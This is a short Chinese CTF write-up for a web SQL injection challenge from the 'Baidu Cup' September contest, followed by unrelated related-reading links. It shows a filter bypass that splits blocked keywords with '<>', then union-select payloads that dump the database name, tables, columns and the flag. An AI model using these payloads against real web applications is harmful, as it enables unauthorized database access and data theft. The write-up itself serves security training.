-
“百度杯”CTF比赛 九月场,Web:SQL
题目内容:
出题人就告诉你这是个注入,有种别走!
看 URL
/index.php?id=1
测过滤
没有过滤: ' 空格 #
被过滤: order by,select
测能否绕过
/**/
1 ord/**/er by 3%23
<>
1 ord<>er by 3%23 有回显
1 ord<>er by 4%23 无回显
?id=-1 union sel<>ect 1,2,3%23
?id=-1 union sel<>ect 1,database(),3%23
?id=-1 union sel<>ect 1,table_name,3 from information_schema.tables where table_schema=database()%23
?id=-1 union sel<>ect 1,column_name,3 from information_schema.columns where table_schema=database()%23
?id=-1 union sel<>ect 1,flAg_T5ZNdrm,3 from info%23
-
相关阅读:
动态规划与贪心算法
PhalAPI学习笔记 ——— 第三章细致讲解使用PSR-4规范自定义你的命名空间
数据结构与算法-冒泡排序
基于java大学生就业信息管理系统
mac本安装Frida
python 里变量内存图
2024年04月在线IDE流行度最新排名
Linux运维面试题总结—Linux基础、计算机网络基础
SpringCloud-Hystrix(熔断器)介绍及使用
《痞子衡嵌入式半月刊》 第 60 期
- 原文地址:https://blog.csdn.net/qq_62260856/article/details/125587909